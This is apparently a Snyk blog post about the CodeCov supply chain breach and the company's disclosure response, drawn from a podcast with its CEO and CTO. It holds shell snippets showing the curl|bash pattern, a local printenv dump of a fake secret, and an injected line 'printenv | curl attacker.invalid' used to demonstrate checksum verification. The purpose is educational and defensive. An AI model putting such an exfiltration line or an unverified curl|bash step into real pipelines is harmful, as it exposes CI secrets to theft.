Responsible disclosure: CodeCov CEO & CTO share learnings from the breach

December 9, 2021

In January of 2021, CodeCov suffered a supply chain attack that exposed client environment variables. In the months that followed, the specifics of the breach and its technical implications were thoroughly examined by the application security community to determine what went wrong and how to combat similar attacks in the future. But another interesting outcome of the breach was the insight it offered into a slightly less glamorous topic: responsible disclosure.

In October 2021, CodeCov CEO Jerrod Engelberg and CTO Eli Hooten appeared on The Secure Developer podcast to give an insider’s perspective on the events. Their conversation with host Guy Podjarny shed light on what it is like to be at the center of an incident and raised interesting questions about how best to respond to similar incidents.

Listen to the full episode today

The CodeCov security incident

At the time of the incident, CodeCov used a curl|bash (a.k.a. “curl pipe bash”, “curl bash piping”, etc.) pattern to upload reports: clients fetched a bash script with curl and piped it straight into a shell. The script itself was hosted in a `private write, public read` CDN bucket. The attacker extracted a credential from a compressed layer of CodeCov’s enterprise Docker image, gained access to the CDN bucket, and made malicious alterations to the bash script. The altered script was pulled into the CI pipeline of every client that made a pull or merge request between the breach and the moment the credentials were revoked. This allowed the attackers to run code inside client CI environments, print the environment variables, and pipe them to a third-party server for later use.
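The danger of this pattern can be sketched without any real exfiltration. Any script a CI job pipes into a shell runs with full access to the job's environment, secrets included. The variable name and file below are hypothetical stand-ins; a real attacker would POST the output to their own server rather than write a local file.

```shell
# Hypothetical illustration of why curl|bash in CI is risky (no network calls).
# The risky pattern itself looks like:
#
#   bash <(curl -s https://cdn.example.invalid/uploader.sh)
#
# Simulate an injected exfiltration line by dumping the environment locally:
export FAKE_DEPLOY_TOKEN="s3cr3t"   # stand-in for a real CI secret
printenv > leaked_env.txt

# Everything the CI job knows, including secrets, is now captured:
grep FAKE_DEPLOY_TOKEN leaked_env.txt
```

A one-line change to a trusted script is all it takes, which is why the window between compromise and credential revocation mattered so much.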

The impact of this attack varied from one customer to the next. If a client managed their CI in a public repository, they likely had nothing of consequence stored in their environment variables. If, however, the customer used a closed repository, where the CI interacts heavily with the tech stack and holds secret information, the breach was cause for serious concern.

As with any supply chain attack, the only certainty was that the information had been leaked. There was no way to know what the attackers planned to do with the stolen environment variables, which meant that the team had to act quickly and decisively.

The CodeCov response

CodeCov’s thesis for disclosure was summarized by Engelberg with: “If even one customer is not able to hear from us, and doesn't take the appropriate action, that's one customer too many.” In practice, however, this ethos became a challenge. When customers sign in to CodeCov, they are given the option to do so with an email address or with a social sign-in (such as OAuth via GitHub or Bitbucket), which keeps their contact information private. It was a convenient choice that later became a critical factor in the disclosure process.

For the customers who chose to create an account directly with CodeCov or who disclosed contact information, the solution was simple: email notifications were sent to every available address, informing customers of the breach and encouraging them to take action. Unfortunately, the majority of CodeCov users didn’t fit into this group. In response, the CodeCov team used every available means to reach the remaining customers.

Public disclosures were made after reporting the incident to federal authorities, announcements detailing the breach were promoted and signal boosted by tech media, and CodeCov flooded the application with notifications. While all reasonable measures were taken to ensure that their user base was notified, the circumstances that led to their sweeping reaction are worth considering.

If CodeCov had required all users to disclose personal information like an email address, then reaching everyone post-breach would have been simple. Giving customers the option to use a social sign-in allowed them to keep their personal data more private, but it also created serious hurdles when urgent communication was needed. Would CodeCov’s disclosure process have looked different if notifying users was as simple as a mass email? Most likely not. As Hooten said, “I think you'll know you're doing it right, when the answer is obvious, even if the way ahead is painful or difficult.” The value structure at the core of CodeCov would have pushed its team toward transparency regardless.

Minimizing business impact through transparency

While no business can come out of a security incident completely unscathed, CodeCov was able to minimize the negative impact through persistent, transparent communication. But despite their quick action, there was some churn. As Engelberg explained, there were “customers that said, ‘Hey, we can't use you at this time.’ Or, champions of our product said, ‘Hey, I love using your product, but the moratorium has come down and I can't use [it anymore]’”. However, the loss of customers would have been far greater without the transparent disclosure the team provided. Vulnerabilities are much easier to fix than broken trust.

Like Snyk, CodeCov is a developer-centered application — and developers need data, not spin. By sticking to the facts and asking for help from the larger security community, CodeCov maintained its credibility and commitment to developers even in the middle of a crisis.

"The best thing that you can do for that same industry that you love, for the same developers that you try to serve, is just step forward fearlessly."

Jerrod Engelberg

CEO, CodeCov

Beyond the breach

The CodeCov security breach revealed truths that extend far beyond a single incident. The nature of the attack highlights potential pitfalls that impact the industry as a whole. The largest is a baseline distribution problem: as open source software becomes increasingly vital to the development cycle, its inherent dependencies are pulled in along with it. The benefits of open source are undeniable; the key is determining how to utilize it safely.

When increasing security post-breach, CodeCov added measures like SHA checksums and signature verification. Users were encouraged to take advantage of these checks to ensure that the scripts they were pulling came from CodeCov directly. However, there is no way to mandate the use of these verifications. As Engelberg explained: “Until this is zero trust [...] there is always this handshake, right? We can make the handshake more and more sophisticated, but it's definitely something that I think a lot about as we move forward and what can come next.”
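A minimal sketch of the checksum check described above, for users who want to verify a script before running it rather than piping curl straight to bash. The file names here are illustrative, not CodeCov's actual endpoints, and in practice the expected digest should come from a separate, trusted channel (such as a signed release page), not the same bucket that serves the script.

```shell
# Stand-in for the script a CI job would normally download:
cat > uploader.sh <<'EOF'
echo "uploading coverage report"
EOF

# Publish the expected digest (in reality, fetched from a trusted channel):
sha256sum uploader.sh > uploader.sh.sha256

# Only execute the script if its digest matches the published one:
sha256sum -c --quiet uploader.sh.sha256 && bash uploader.sh

# Any tampering, like an attacker's injected exfiltration line, breaks the check:
echo 'printenv | curl attacker.invalid' >> uploader.sh
sha256sum -c uploader.sh.sha256 || echo "digest mismatch: refusing to run"
```

As Engelberg's comment suggests, the check only helps users who actually run it; nothing in the curl|bash distribution model forces the verification step.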

We can educate users on the potential risks and give them tools to audit the code, but we can't force anyone to take the extra steps. The handshake agreement between company and customer is deeply rooted in the culture of development. Our task as an industry is to determine the best plan for risk mitigation.

Want to learn more about the CodeCov breach and what it revealed about the industry? Head over to The Secure Developer to hear the full podcast. Engelberg and Hooten opened CodeCov’s doors and offered firsthand insight into in-house security prep, advice for CEOs/CTOs, how empathy altered the course of the crisis, and much more.

Snyk is a developer security platform. Integrating directly into development tools, workflows, and automation pipelines, Snyk makes it easy for teams to find, prioritize, and fix security vulnerabilities in code, dependencies, containers, and infrastructure as code. Supported by industry-leading application and security intelligence, Snyk puts security expertise in any developer’s toolkit.
